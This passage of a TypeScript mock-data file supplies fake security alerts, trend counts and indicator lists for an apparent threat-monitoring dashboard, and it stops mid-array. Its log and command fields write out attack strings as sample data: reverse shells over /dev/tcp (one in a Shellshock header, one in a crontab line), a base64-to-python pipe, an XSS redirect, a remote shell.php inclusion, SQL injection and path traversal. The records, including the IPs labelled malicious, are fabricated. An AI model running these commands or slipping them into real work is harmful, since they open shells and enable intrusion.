import type {
  AlertRecord,
  TrendPoint,
  TopRule,
  TopIoc,
  WorkflowStatus,
  DashboardCounters,
  StatsResponse,
} from './types'

// Base timestamp: 2026-05-21T12:00:00Z (today at noon)
const BASE = new Date('2026-05-21T12:00:00Z').getTime()
function ago(ms: number): string {
  return new Date(BASE - ms).toISOString()
}
const MIN = 60_000
const H   = 3_600_000

// ─── Alerts ──────────────────────────────────────────────────────────────────

export const MOCK_ALERTS: AlertRecord[] = [
  // ── CRITICAL (level 15) ───────────────────────────────────────────────────
  {
    id: '1001',
    created_at: ago(5 * MIN),
    rule_id: '5710',
    rule_desc: 'SSH brute force attack detected — 523 failed attempts in 60s',
    rule_level: 15,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'root',
    command: null,
    iocs: [
      { value: '185.234.219.42', type: 'IP', verdict: 'MALICIOUS' },
      { value: '45.33.32.156',   type: 'IP', verdict: 'MALICIOUS' },
    ],
    raw_alert: { full_log: 'sshd[2341]: Failed password for root from 185.234.219.42' },
    status: 'processing',
    retry_count: 0,
    processed_at: null,
    llm_verdict: {
      severity: 'critical',
      verdict: 'malicious',
      reason: 'Over 500 failed SSH login attempts from two known malicious IPs in under 60 seconds.',
      plain_english_summary: 'Someone is aggressively trying to break into your server via SSH.',
      damage_explanation: 'If successful, the attacker would gain full root access to bastion-01, enabling lateral movement across your entire network.',
      suggested_action: 'Block IPs 185.234.219.42 and 45.33.32.156 at the firewall immediately. Review SSH access logs and rotate credentials.',
      confidence: 'high',
    },
  },
  {
    id: '1002',
    created_at: ago(18 * MIN),
    rule_id: '40101',
    rule_desc: 'Shellshock exploit attempt detected in HTTP request',
    rule_level: 15,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: 'www-data',
    command: null,
    iocs: [
      { value: '91.108.56.100', type: 'IP', verdict: 'MALICIOUS' },
      { value: 'http://evil-update.net/payload.sh', type: 'URL', verdict: 'MALICIOUS' },
    ],
    raw_alert: { full_log: 'GET /cgi-bin/test.cgi HTTP/1.1 User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/91.108.56.100/4444' },
    status: 'done',
    retry_count: 1,
    processed_at: ago(15 * MIN),
    llm_verdict: {
      severity: 'critical',
      verdict: 'malicious',
      reason: 'Classic Shellshock (CVE-2014-6271) exploit attempt targeting CGI scripts, with reverse shell payload.',
      plain_english_summary: 'An attacker tried to exploit a critical web server vulnerability to gain shell access.',
      damage_explanation: 'Shellshock allows remote code execution on the web server. A successful exploit would give the attacker a persistent backdoor.',
      suggested_action: 'Verify the exploit was blocked. Patch bash immediately and disable unused CGI scripts.',
      confidence: 'high',
    },
  },
  {
    id: '1003',
    created_at: ago(32 * MIN),
    rule_id: '87903',
    rule_desc: 'FIM: Suspicious binary deleted from /usr/bin — possible rootkit cleanup',
    rule_level: 15,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: 'rm -f /usr/bin/.hidden_sshd',
    iocs: [
      { value: 'a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2', type: 'SHA256', verdict: 'MALICIOUS' },
    ],
    raw_alert: { full_log: '[FIM] File deleted: /usr/bin/.hidden_sshd sha256=a1b2c3d4...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(28 * MIN),
    llm_verdict: {
      severity: 'critical',
      verdict: 'malicious',
      reason: 'A hidden binary with a name mimicking sshd was removed from /usr/bin. Indicates prior compromise and attempted cleanup.',
      plain_english_summary: 'A hidden malicious program was found and deleted from your database server — your system may have been compromised.',
      damage_explanation: 'The presence of a hidden binary named after a legitimate process is a strong indicator of rootkit activity. Data exfiltration may have occurred.',
      suggested_action: 'Isolate db-primary immediately. Perform a full forensic investigation. Restore from a known-good backup.',
      confidence: 'high',
    },
  },
  {
    id: '1004',
    created_at: ago(55 * MIN),
    rule_id: '92010',
    rule_desc: 'Suricata: Outbound cryptocurrency mining traffic detected',
    rule_level: 15,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: null,
    command: null,
    iocs: [
      { value: '103.21.244.0', type: 'IP', verdict: 'MALICIOUS' },
      { value: 'pool.minexmr.com', type: 'DOMAIN', verdict: 'MALICIOUS' },
    ],
    raw_alert: { full_log: 'ET MINING Monero Mining Pool Traffic Detected' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(50 * MIN),
    llm_verdict: {
      severity: 'critical',
      verdict: 'malicious',
      reason: 'Worker node is sending outbound traffic to a known Monero mining pool. Indicates cryptominer deployment.',
      plain_english_summary: 'Your worker server is secretly mining cryptocurrency for an attacker.',
      damage_explanation: 'The system is running unauthorized software, consuming CPU/GPU resources and causing significant cost overruns.',
      suggested_action: 'Kill the mining process immediately. Identify how it was deployed and patch the entry vector.',
      confidence: 'high',
    },
  },
  {
    id: '1005',
    created_at: ago(1.2 * H),
    rule_id: '80792',
    rule_desc: 'Suspicious process: base64-encoded payload executed via bash',
    rule_level: 15,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'deploy',
    command: 'bash -c "echo aW1wb3J0IHNvY2tldA==|base64 -d|python3"',
    iocs: [],
    raw_alert: { full_log: 'execve: bash -c echo aW1wb3J0IHNvY2tldA==|base64 -d|python3' },
    status: 'pending',
    retry_count: 2,
    processed_at: null,
    llm_verdict: {
      severity: 'critical',
      verdict: 'malicious',
      reason: 'Base64-encoded Python payload executed via bash is a classic obfuscation technique used in malware droppers.',
      plain_english_summary: 'A hidden script was run on your API gateway — likely malware trying to avoid detection.',
      damage_explanation: 'Obfuscated payloads are used to deploy backdoors, exfiltrate data, or establish C2 channels.',
      suggested_action: 'Decode and inspect the payload. Quarantine the deploy user account and audit all recent deployments.',
      confidence: 'high',
    },
  },
  {
    id: '1006',
    created_at: ago(2.1 * H),
    rule_id: '5710',
    rule_desc: 'SSH brute force attack detected — 189 failed attempts in 30s',
    rule_level: 15,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'admin',
    command: null,
    iocs: [{ value: '46.101.127.188', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'sshd[8812]: Failed password for admin from 46.101.127.188' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(2 * H),
    llm_verdict: null,
  },
  {
    id: '1007',
    created_at: ago(3.5 * H),
    rule_id: '87902',
    rule_desc: 'FIM: New SUID binary created in /tmp — privilege escalation attempt',
    rule_level: 15,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'postgres',
    command: 'chmod +s /tmp/.priv_esc',
    iocs: [
      { value: 'f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2', type: 'SHA256', verdict: 'MALICIOUS' },
    ],
    raw_alert: { full_log: '[FIM] File added with SUID bit: /tmp/.priv_esc' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(3.3 * H),
    llm_verdict: null,
  },
  {
    id: '1008',
    created_at: ago(4.8 * H),
    rule_id: '31120',
    rule_desc: 'Web attack: SQL injection attempt in login endpoint',
    rule_level: 15,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: '194.165.16.78', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: "POST /api/login HTTP/1.1 body: {username: \"' OR 1=1 --\"}" },
    status: 'done',
    retry_count: 0,
    processed_at: ago(4.7 * H),
    llm_verdict: null,
  },
  {
    id: '1009',
    created_at: ago(6.2 * H),
    rule_id: '92000',
    rule_desc: 'Suricata: Metasploit Meterpreter session detected',
    rule_level: 15,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: null,
    command: null,
    iocs: [{ value: '5.34.180.200', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'ET MALWARE Meterpreter Reverse TCP Stager' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(6 * H),
    llm_verdict: null,
  },
  {
    id: '1010',
    created_at: ago(8.5 * H),
    rule_id: '80792',
    rule_desc: 'Suspicious crontab modification: reverse shell scheduled',
    rule_level: 15,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'root',
    command: '*/5 * * * * bash -i >& /dev/tcp/185.234.219.42/4445 0>&1',
    iocs: [{ value: '185.234.219.42', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'crontab modified: */5 * * * * bash -i >& /dev/tcp/185.234.219.42/4445' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(8.3 * H),
    llm_verdict: null,
  },

  // ── HIGH (level 12-14) ────────────────────────────────────────────────────
  {
    id: '1011',
    created_at: ago(8 * MIN),
    rule_id: '5715',
    rule_desc: 'SSH authentication failure from known scanner',
    rule_level: 14,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'ubuntu',
    command: null,
    iocs: [{ value: '198.54.117.200', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'sshd[3421]: Failed password for ubuntu from 198.54.117.200' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(6 * MIN),
    llm_verdict: null,
  },
  {
    id: '1012',
    created_at: ago(22 * MIN),
    rule_id: '31151',
    rule_desc: 'XSS injection attempt in user profile field',
    rule_level: 13,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: '77.247.182.31', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'POST /api/profile body: name=<script>document.location=\'http://evil.cc/\'</script>' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(20 * MIN),
    llm_verdict: null,
  },
  {
    id: '1013',
    created_at: ago(38 * MIN),
    rule_id: '87901',
    rule_desc: 'FIM: /etc/passwd modified outside maintenance window',
    rule_level: 14,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /etc/passwd sha256=c9f8...' },
    status: 'processing',
    retry_count: 1,
    processed_at: null,
    llm_verdict: null,
  },
  {
    id: '1014',
    created_at: ago(52 * MIN),
    rule_id: '92000',
    rule_desc: 'Suricata: Port scan detected — 1024 ports in 10s',
    rule_level: 12,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: null,
    command: null,
    iocs: [{ value: '185.220.101.45', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'ET SCAN Nmap SYN Scan detected from 185.220.101.45' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(50 * MIN),
    llm_verdict: null,
  },
  {
    id: '1015',
    created_at: ago(1.1 * H),
    rule_id: '5503',
    rule_desc: 'PAM: Multiple authentication failures for privileged account',
    rule_level: 13,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: 'postgres',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(sudo:auth): authentication failure for user postgres' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(1 * H),
    llm_verdict: null,
  },
  {
    id: '1016',
    created_at: ago(1.5 * H),
    rule_id: '87902',
    rule_desc: 'FIM: New authorized_keys entry added to root account',
    rule_level: 14,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /root/.ssh/authorized_keys' },
    status: 'pending',
    retry_count: 0,
    processed_at: null,
    llm_verdict: null,
  },
  {
    id: '1017',
    created_at: ago(2.3 * H),
    rule_id: '31120',
    rule_desc: 'Web attack: Directory traversal attempt on /api/files',
    rule_level: 12,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: '103.21.244.0', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'GET /api/files?path=../../../etc/passwd HTTP/1.1' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(2.2 * H),
    llm_verdict: null,
  },
  {
    id: '1018',
    created_at: ago(3 * H),
    rule_id: '5710',
    rule_desc: 'SSH login from unusual country — connection from RU:Moscow',
    rule_level: 13,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'deploy',
    command: null,
    iocs: [{ value: '95.142.47.100', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'sshd[4521]: Accepted publickey for deploy from 95.142.47.100' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(2.9 * H),
    llm_verdict: null,
  },
  {
    id: '1019',
    created_at: ago(4.2 * H),
    rule_id: '92000',
    rule_desc: 'Suricata: DNS tunneling traffic detected',
    rule_level: 14,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: null,
    command: null,
    iocs: [{ value: 'data-exfil.malware-c2.ru', type: 'DOMAIN', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'ET POLICY DNS TXT Query for exfiltration domain' },
    status: 'error',
    retry_count: 3,
    processed_at: null,
    llm_verdict: null,
  },
  {
    id: '1020',
    created_at: ago(5.5 * H),
    rule_id: '80792',
    rule_desc: 'Privilege escalation: sudo executed by non-admin user',
    rule_level: 12,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: 'app-worker',
    command: 'sudo /bin/bash',
    iocs: [],
    raw_alert: { full_log: 'sudo: app-worker : command not allowed ; TTY=pts/0 ; COMMAND=/bin/bash' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(5.4 * H),
    llm_verdict: null,
  },
  {
    id: '1021',
    created_at: ago(6.8 * H),
    rule_id: '5715',
    rule_desc: 'SSH brute force — credential stuffing pattern detected',
    rule_level: 13,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'git',
    command: null,
    iocs: [{ value: '31.184.199.3', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'sshd[5512]: Failed password for git from 31.184.199.3 port 54923 ssh2' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(6.7 * H),
    llm_verdict: null,
  },
  {
    id: '1022',
    created_at: ago(9.1 * H),
    rule_id: '87901',
    rule_desc: 'FIM: sudoers file modified — privilege escalation vector',
    rule_level: 14,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /etc/sudoers sha256=deadbeef...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(9 * H),
    llm_verdict: null,
  },
  {
    id: '1023',
    created_at: ago(11 * H),
    rule_id: '31120',
    rule_desc: 'Web attack: Remote file inclusion attempt',
    rule_level: 12,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: 'http://phish-kit.xyz/shell.php', type: 'URL', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'GET /include.php?file=http://phish-kit.xyz/shell.php HTTP/1.1' },
    status: 'error',
    retry_count: 3,
    processed_at: null,
    llm_verdict: null,
  },
  {
    id: '1024',
    created_at: ago(13.5 * H),
    rule_id: '92000',
    rule_desc: 'Suricata: TOR exit node connection detected',
    rule_level: 13,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: null,
    command: null,
    iocs: [{ value: '204.13.164.118', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'ET TOR Known Tor Exit Node Traffic' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(13.4 * H),
    llm_verdict: null,
  },
  {
    id: '1025',
    created_at: ago(15.2 * H),
    rule_id: '5710',
    rule_desc: 'SSH scan: 47 distinct usernames tried in 120s',
    rule_level: 14,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: null,
    command: null,
    iocs: [{ value: '78.128.113.104', type: 'IP', verdict: 'MALICIOUS' }],
    raw_alert: { full_log: 'sshd[7732]: Invalid user testuser from 78.128.113.104' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(15 * H),
    llm_verdict: null,
  },

  // ── MEDIUM (level 7-11) ───────────────────────────────────────────────────
  {
    id: '1026',
    created_at: ago(12 * MIN),
    rule_id: '5503',
    rule_desc: 'PAM: User login failed — 3 attempts',
    rule_level: 10,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: 'jenkins',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(login:auth): authentication failure; user=jenkins' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(10 * MIN),
    llm_verdict: null,
  },
  {
    id: '1027',
    created_at: ago(25 * MIN),
    rule_id: '1002',
    rule_desc: 'System error: OOM killer invoked — process killed',
    rule_level: 8,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: null,
    command: null,
    iocs: [],
    raw_alert: { full_log: 'kernel: Out of memory: Kill process 12445 (node) score 892 or sacrifice child' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(23 * MIN),
    llm_verdict: null,
  },
  {
    id: '1028',
    created_at: ago(41 * MIN),
    rule_id: '87901',
    rule_desc: 'FIM: Configuration file changed — /etc/nginx/nginx.conf',
    rule_level: 9,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: 'deploy',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /etc/nginx/nginx.conf sha256=aa33...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(39 * MIN),
    llm_verdict: null,
  },
  {
    id: '1029',
    created_at: ago(59 * MIN),
    rule_id: '5715',
    rule_desc: 'SSH authentication failure — invalid user',
    rule_level: 7,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'test',
    command: null,
    iocs: [{ value: '167.248.133.60', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'sshd[9932]: Invalid user test from 167.248.133.60 port 48120 ssh2' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(57 * MIN),
    llm_verdict: null,
  },
  {
    id: '1030',
    created_at: ago(1.3 * H),
    rule_id: '87902',
    rule_desc: 'FIM: New cron job file created in /etc/cron.d/',
    rule_level: 10,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File added: /etc/cron.d/db-backup sha256=bb44...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(1.2 * H),
    llm_verdict: null,
  },
  {
    id: '1031',
    created_at: ago(1.8 * H),
    rule_id: '92000',
    rule_desc: 'Suricata: SMTP relay abuse attempt detected',
    rule_level: 9,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: '51.159.70.160', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'ET POLICY SMTP Open Relay Attempt detected' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(1.75 * H),
    llm_verdict: null,
  },
  {
    id: '1032',
    created_at: ago(2.5 * H),
    rule_id: '5503',
    rule_desc: 'PAM: Root login via su from unprivileged user',
    rule_level: 11,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: 'app-worker',
    command: 'su root',
    iocs: [],
    raw_alert: { full_log: 'pam_unix(su:session): session opened for user root by app-worker(uid=1001)' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(2.45 * H),
    llm_verdict: null,
  },
  {
    id: '1033',
    created_at: ago(3.8 * H),
    rule_id: '1002',
    rule_desc: 'Disk usage critical — /var at 94%',
    rule_level: 8,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: null,
    command: null,
    iocs: [],
    raw_alert: { full_log: 'df: /var: 94% used (42G/45G)' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(3.75 * H),
    llm_verdict: null,
  },
  {
    id: '1034',
    created_at: ago(5 * H),
    rule_id: '87901',
    rule_desc: 'FIM: SSL certificate file replaced',
    rule_level: 10,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /etc/ssl/certs/server.pem sha256=cc55...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(4.95 * H),
    llm_verdict: null,
  },
  {
    id: '1035',
    created_at: ago(7.2 * H),
    rule_id: '5715',
    rule_desc: 'SSH: Multiple users tried from same source IP',
    rule_level: 9,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'git',
    command: null,
    iocs: [{ value: '212.83.175.79', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'sshd[1023]: Invalid user git from 212.83.175.79' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(7.1 * H),
    llm_verdict: null,
  },
  {
    id: '1036',
    created_at: ago(10.3 * H),
    rule_id: '92000',
    rule_desc: 'Suricata: Unusual outbound data transfer — 450MB in 5min',
    rule_level: 11,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: null,
    command: null,
    iocs: [{ value: '209.58.189.140', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'ET POLICY Large Outbound Data Transfer detected' },
    status: 'error',
    retry_count: 3,
    processed_at: null,
    llm_verdict: null,
  },
  {
    id: '1037',
    created_at: ago(12.5 * H),
    rule_id: '31120',
    rule_desc: 'Web attack: LDAP injection attempt in search query',
    rule_level: 10,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: null,
    command: null,
    iocs: [{ value: '85.209.134.200', type: 'IP', verdict: 'SUSPICIOUS' }],
    raw_alert: { full_log: 'GET /api/search?q=*%29%28%7C%28password%3D%2A HTTP/1.1' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(12.4 * H),
    llm_verdict: null,
  },
  {
    id: '1038',
    created_at: ago(14 * H),
    rule_id: '87902',
    rule_desc: 'FIM: Python script added to /usr/local/bin',
    rule_level: 7,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: 'deploy',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File added: /usr/local/bin/monitor.py sha256=dd66...' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(13.9 * H),
    llm_verdict: null,
  },
  {
    id: '1039',
    created_at: ago(16.5 * H),
    rule_id: '5503',
    rule_desc: 'PAM: Repeated SSH login failures — 12 attempts',
    rule_level: 10,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'ubuntu',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(sshd:auth): authentication failure for ubuntu' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(16.4 * H),
    llm_verdict: null,
  },
  {
    id: '1040',
    created_at: ago(18.8 * H),
    rule_id: '1002',
    rule_desc: 'Service crash: PostgreSQL restarted unexpectedly',
    rule_level: 8,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'postgres',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'systemd[1]: postgresql.service: Main process exited, code=killed, status=9/KILL' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(18.7 * H),
    llm_verdict: null,
  },

  // ── LOW (level 1-6) ───────────────────────────────────────────────────────
  {
    id: '1041',
    created_at: ago(3 * MIN),
    rule_id: '5501',
    rule_desc: 'User login successful',
    rule_level: 3,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: 'deploy',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(login:session): session opened for user deploy' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(2 * MIN),
    llm_verdict: null,
  },
  {
    id: '1042',
    created_at: ago(15 * MIN),
    rule_id: '1002',
    rule_desc: 'System: High CPU utilization detected — 91%',
    rule_level: 5,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: null,
    command: null,
    iocs: [],
    raw_alert: { full_log: 'top: cpu_util=91.3%' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(13 * MIN),
    llm_verdict: null,
  },
  {
    id: '1043',
    created_at: ago(35 * MIN),
    rule_id: '5501',
    rule_desc: 'User login successful from new IP',
    rule_level: 4,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'alice',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(sshd:session): session opened for user alice from 93.184.216.34' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(33 * MIN),
    llm_verdict: null,
  },
  {
    id: '1044',
    created_at: ago(1 * H),
    rule_id: '87902',
    rule_desc: 'FIM: Log file rotation — /var/log/syslog rotated',
    rule_level: 2,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File renamed: /var/log/syslog → /var/log/syslog.1' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(58 * MIN),
    llm_verdict: null,
  },
  {
    id: '1045',
    created_at: ago(2 * H),
    rule_id: '5501',
    rule_desc: 'Scheduled task executed successfully — backup job',
    rule_level: 1,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: 'root',
    command: '/usr/bin/pg_dump -Fc mydb > /backups/mydb_20260521.dump',
    iocs: [],
    raw_alert: { full_log: 'cron: (root) CMD (/usr/bin/pg_dump -Fc mydb > /backups/mydb_20260521.dump)' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(1.98 * H),
    llm_verdict: null,
  },
  {
    id: '1046',
    created_at: ago(4 * H),
    rule_id: '1002',
    rule_desc: 'Package manager invoked outside normal window',
    rule_level: 6,
    agent_name: 'web-01',
    agent_ip: '10.0.1.10',
    username: 'root',
    command: 'apt-get install -y curl',
    iocs: [],
    raw_alert: { full_log: 'apt-get: install curl version 7.88.1' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(3.97 * H),
    llm_verdict: null,
  },
  {
    id: '1047',
    created_at: ago(7 * H),
    rule_id: '5501',
    rule_desc: 'User login successful — service account',
    rule_level: 3,
    agent_name: 'api-gateway',
    agent_ip: '10.0.3.1',
    username: 'prometheus',
    command: null,
    iocs: [],
    raw_alert: { full_log: 'pam_unix(sshd:session): session opened for user prometheus' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(6.98 * H),
    llm_verdict: null,
  },
  {
    id: '1048',
    created_at: ago(11 * H),
    rule_id: '87901',
    rule_desc: 'FIM: Docker image manifest updated',
    rule_level: 4,
    agent_name: 'worker-node-2',
    agent_ip: '10.0.4.8',
    username: 'root',
    command: null,
    iocs: [],
    raw_alert: { full_log: '[FIM] File modified: /var/lib/docker/image/overlay2/repositories.json' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(10.95 * H),
    llm_verdict: null,
  },
  {
    id: '1049',
    created_at: ago(16 * H),
    rule_id: '1002',
    rule_desc: 'Swap usage high — 78% swap consumed',
    rule_level: 5,
    agent_name: 'db-primary',
    agent_ip: '10.0.1.20',
    username: null,
    command: null,
    iocs: [],
    raw_alert: { full_log: 'sar: swap usage 78%' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(15.97 * H),
    llm_verdict: null,
  },
  {
    id: '1050',
    created_at: ago(22 * H),
    rule_id: '5501',
    rule_desc: 'User account created — new developer onboarded',
    rule_level: 4,
    agent_name: 'bastion-01',
    agent_ip: '10.0.2.5',
    username: 'root',
    command: 'useradd -m -s /bin/bash bob',
    iocs: [],
    raw_alert: { full_log: 'useradd: new user: name=bob, UID=1004, GID=1004' },
    status: 'done',
    retry_count: 0,
    processed_at: ago(21.97 * H),
    llm_verdict: null,
  },
]

// ─── Trend (24h, one point per hour) ─────────────────────────────────────────

export const MOCK_TREND: TrendPoint[] = Array.from({ length: 24 }, (_, i) => {
  const hourTs = new Date(BASE - (23 - i) * H).toISOString()
  const count = [
    12, 8, 42, 18, 9, 6, 4, 11, 35, 27, 41, 55,
    63, 48, 38, 29, 44, 71, 58, 39, 22, 31, 19, 14,
  ][i]
  const critical = [
    1, 0, 4, 2, 0, 0, 0, 1, 3, 2, 4, 7,
    8, 5, 4, 3, 5, 9, 7, 4, 2, 3, 1, 1,
  ][i]
  return { hour: hourTs, count, critical }
})

// ─── Top rules ────────────────────────────────────────────────────────────────

export const MOCK_TOP_RULES: TopRule[] = [
  { rule_id: '5715', rule_desc: 'SSH authentication failure', count: 312 },
  { rule_id: '5710', rule_desc: 'SSH brute force attack detected', count: 228 },
  { rule_id: '31120', rule_desc: 'Web attack attempt detected', count: 187 },
  { rule_id: '5503', rule_desc: 'PAM: User authentication failure', count: 142 },
  { rule_id: '87902', rule_desc: 'FIM: File added in monitored directory', count: 98 },
  { rule_id: '92000', rule_desc: 'Suricata: IDS alert fired', count: 76 },
  { rule_id: '87901', rule_desc: 'FIM: File modified in monitored directory', count: 64 },
  { rule_id: '80792', rule_desc: 'Suspicious process execution detected', count: 51 },
  { rule_id: '1002', rule_desc: 'Unknown system error or anomaly', count: 39 },
  { rule_id: '40101', rule_desc: 'Shellshock exploit attempt', count: 12 },
]

// ─── Top IOCs ─────────────────────────────────────────────────────────────────

export const MOCK_IOCS: TopIoc[] = [
  { ioc_value: '185.234.219.42',   ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 18, last_seen: ago(5 * MIN) },
  { ioc_value: '45.33.32.156',     ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 14, last_seen: ago(5 * MIN) },
  { ioc_value: '103.21.244.0',     ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 11, last_seen: ago(52 * MIN) },
  { ioc_value: 'pool.minexmr.com', ioc_type: 'DOMAIN', verdict: 'MALICIOUS',  occurrences: 9,  last_seen: ago(55 * MIN) },
  { ioc_value: '91.108.56.100',    ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 8,  last_seen: ago(18 * MIN) },
